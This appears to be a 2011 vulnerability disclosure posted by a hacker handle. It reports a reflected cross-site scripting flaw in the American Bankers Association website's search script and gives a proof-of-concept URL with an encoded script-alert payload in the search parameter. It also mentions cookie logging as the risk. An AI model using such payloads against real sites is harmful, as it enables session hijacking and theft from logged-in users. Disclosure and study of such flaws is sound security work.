American Bankers Association suffers from a cross site scripting vulnerability.
24ae71d450be9e69d7651aabe878550e6e3085eea66e94aa964692fd1b4d2fba
########################################################
| Title : American Bankers Association(aba.com) XSS
| Author : Codeine
| Email : f3codeine[at]yahoo[dot]com
| Site : http://infosecforums.com/
| Date : 08/09/2011
| Cat : PHP[XSS]
| URL : http://aba.com/
########################################################
American Bankers Association uses a search script provided by "xSynthesis Search". After checking no current version by them is vulnerable.
Since aba.com allows users to login, this vulnerability presents a great security risk regarding cookie logging.
This is not persistent but still provides a area a risk.
[*]XSS Vulnerability
http://www.aba.com/Search2/searchaba.aspx?xr=t&adv=t&PageSize=10&MaxPages=200&SearchKind=ExactPhrase&SearchPhrase=%3Cscript%3Ealert%28%27CodeineXSS%27%29%3B%3C%2Fscript%3E
I used <script>alert('CodeineXSS');</script> works in all of the input feilds.
______________________________________________________________________________________
Greetz Hidden Ninja